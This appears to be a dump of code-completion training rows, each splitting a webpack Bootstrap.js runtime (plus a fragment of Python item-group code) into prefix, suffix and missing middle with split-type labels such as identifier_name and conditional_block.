data['members'].append((i.id, i.get_name()))
b = Brok('initial_' + cls.my_type + '_status', data)
return b
class Itemgroups(Items):
# If a prop is absent and is not required, put the default value
def fill_default(self):
for i in self:
i.fill_default()
def add(self, ig):
self.add_item(ig)
def get_members_by_name(self, gname):
g = self.find_by_name(gname)
if g is None:
return []
return getattr(g, 'members', [])
| __delitem__ | identifier_name |
Bootstrap.js | /******/ (function(modules) { // webpackBootstrap
/******/ // The module cache
/******/ var installedModules = {};
/******/
/******/ // The require function
/******/ function __webpack_require__(moduleId) {
/******/
/******/ // Check if module is in cache
/******/ if(installedModules[moduleId])
/******/ return installedModules[moduleId].exports;
/******/
/******/ // Create a new module (and put it into the cache)
/******/ var module = installedModules[moduleId] = {
/******/ i: moduleId,
/******/ l: false,
/******/ exports: {}
/******/ };
/******/
/******/ // Execute the module function
/******/ modules[moduleId].call(module.exports, module, module.exports, __webpack_require__);
/******/
/******/ // Flag the module as loaded
/******/ module.l = true;
/******/
/******/ // Return the exports of the module
/******/ return module.exports;
/******/ }
/******/
/******/
/******/ // expose the modules object (__webpack_modules__)
/******/ __webpack_require__.m = modules;
/******/
/******/ // expose the module cache
/******/ __webpack_require__.c = installedModules;
/******/
/******/ // identity function for calling harmony imports with the correct context
/******/ __webpack_require__.i = function(value) { return value; };
/******/
/******/ // define getter function for harmony exports
/******/ __webpack_require__.d = function(exports, name, getter) {
/******/ if(!__webpack_require__.o(exports, name)) {
/******/ Object.defineProperty(exports, name, {
/******/ configurable: false,
/******/ enumerable: true,
/******/ get: getter
/******/ });
/******/ }
/******/ };
/******/
/******/ // getDefaultExport function for compatibility with non-harmony modules
/******/ __webpack_require__.n = function(module) {
/******/ var getter = module && module.__esModule ?
/******/ function getDefault() { return module['default']; } :
/******/ function getModuleExports() { return module; };
/******/ __webpack_require__.d(getter, 'a', getter);
/******/ return getter;
/******/ };
/******/
/******/ // Object.prototype.hasOwnProperty.call
/******/ __webpack_require__.o = function(object, property) { return Object.prototype.hasOwnProperty.call(object, property); };
/******/
/******/ // __webpack_public_path__
/******/ __webpack_require__.p = "";
/******/
/******/ // Load entry module and return exports
/******/ return __webpack_require__(__webpack_require__.s = 4);
/******/ })
/************************************************************************/
/******/ ([
/* 0 */,
/* 1 */,
/* 2 */
/***/ (function(module, exports) {
// removed by extract-text-webpack-plugin
/***/ }),
/* 3 */,
/* 4 */
/***/ (function(module, exports, __webpack_require__) {
|
/***/ })
/******/ ]);
//# sourceMappingURL=Bootstrap.js.map | module.exports = __webpack_require__(2); | random_line_split |
Bootstrap.js | /******/ (function(modules) { // webpackBootstrap
/******/ // The module cache
/******/ var installedModules = {};
/******/
/******/ // The require function
/******/ function __webpack_require__(moduleId) {
/******/
/******/ // Check if module is in cache
/******/ if(installedModules[moduleId])
/******/ return installedModules[moduleId].exports;
/******/
/******/ // Create a new module (and put it into the cache)
/******/ var module = installedModules[moduleId] = {
/******/ i: moduleId,
/******/ l: false,
/******/ exports: {}
/******/ };
/******/
/******/ // Execute the module function
/******/ modules[moduleId].call(module.exports, module, module.exports, __webpack_require__);
/******/
/******/ // Flag the module as loaded
/******/ module.l = true;
/******/
/******/ // Return the exports of the module
/******/ return module.exports;
/******/ }
/******/
/******/
/******/ // expose the modules object (__webpack_modules__)
/******/ __webpack_require__.m = modules;
/******/
/******/ // expose the module cache
/******/ __webpack_require__.c = installedModules;
/******/
/******/ // identity function for calling harmony imports with the correct context
/******/ __webpack_require__.i = function(value) { return value; };
/******/
/******/ // define getter function for harmony exports
/******/ __webpack_require__.d = function(exports, name, getter) {
/******/ if(!__webpack_require__.o(exports, name)) |
/******/ };
/******/
/******/ // getDefaultExport function for compatibility with non-harmony modules
/******/ __webpack_require__.n = function(module) {
/******/ var getter = module && module.__esModule ?
/******/ function getDefault() { return module['default']; } :
/******/ function getModuleExports() { return module; };
/******/ __webpack_require__.d(getter, 'a', getter);
/******/ return getter;
/******/ };
/******/
/******/ // Object.prototype.hasOwnProperty.call
/******/ __webpack_require__.o = function(object, property) { return Object.prototype.hasOwnProperty.call(object, property); };
/******/
/******/ // __webpack_public_path__
/******/ __webpack_require__.p = "";
/******/
/******/ // Load entry module and return exports
/******/ return __webpack_require__(__webpack_require__.s = 4);
/******/ })
/************************************************************************/
/******/ ([
/* 0 */,
/* 1 */,
/* 2 */
/***/ (function(module, exports) {
// removed by extract-text-webpack-plugin
/***/ }),
/* 3 */,
/* 4 */
/***/ (function(module, exports, __webpack_require__) {
module.exports = __webpack_require__(2);
/***/ })
/******/ ]);
//# sourceMappingURL=Bootstrap.js.map | {
/******/ Object.defineProperty(exports, name, {
/******/ configurable: false,
/******/ enumerable: true,
/******/ get: getter
/******/ });
/******/ } | conditional_block |
Bootstrap.js | /******/ (function(modules) { // webpackBootstrap
/******/ // The module cache
/******/ var installedModules = {};
/******/
/******/ // The require function
/******/ function | (moduleId) {
/******/
/******/ // Check if module is in cache
/******/ if(installedModules[moduleId])
/******/ return installedModules[moduleId].exports;
/******/
/******/ // Create a new module (and put it into the cache)
/******/ var module = installedModules[moduleId] = {
/******/ i: moduleId,
/******/ l: false,
/******/ exports: {}
/******/ };
/******/
/******/ // Execute the module function
/******/ modules[moduleId].call(module.exports, module, module.exports, __webpack_require__);
/******/
/******/ // Flag the module as loaded
/******/ module.l = true;
/******/
/******/ // Return the exports of the module
/******/ return module.exports;
/******/ }
/******/
/******/
/******/ // expose the modules object (__webpack_modules__)
/******/ __webpack_require__.m = modules;
/******/
/******/ // expose the module cache
/******/ __webpack_require__.c = installedModules;
/******/
/******/ // identity function for calling harmony imports with the correct context
/******/ __webpack_require__.i = function(value) { return value; };
/******/
/******/ // define getter function for harmony exports
/******/ __webpack_require__.d = function(exports, name, getter) {
/******/ if(!__webpack_require__.o(exports, name)) {
/******/ Object.defineProperty(exports, name, {
/******/ configurable: false,
/******/ enumerable: true,
/******/ get: getter
/******/ });
/******/ }
/******/ };
/******/
/******/ // getDefaultExport function for compatibility with non-harmony modules
/******/ __webpack_require__.n = function(module) {
/******/ var getter = module && module.__esModule ?
/******/ function getDefault() { return module['default']; } :
/******/ function getModuleExports() { return module; };
/******/ __webpack_require__.d(getter, 'a', getter);
/******/ return getter;
/******/ };
/******/
/******/ // Object.prototype.hasOwnProperty.call
/******/ __webpack_require__.o = function(object, property) { return Object.prototype.hasOwnProperty.call(object, property); };
/******/
/******/ // __webpack_public_path__
/******/ __webpack_require__.p = "";
/******/
/******/ // Load entry module and return exports
/******/ return __webpack_require__(__webpack_require__.s = 4);
/******/ })
/************************************************************************/
/******/ ([
/* 0 */,
/* 1 */,
/* 2 */
/***/ (function(module, exports) {
// removed by extract-text-webpack-plugin
/***/ }),
/* 3 */,
/* 4 */
/***/ (function(module, exports, __webpack_require__) {
module.exports = __webpack_require__(2);
/***/ })
/******/ ]);
//# sourceMappingURL=Bootstrap.js.map | __webpack_require__ | identifier_name |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.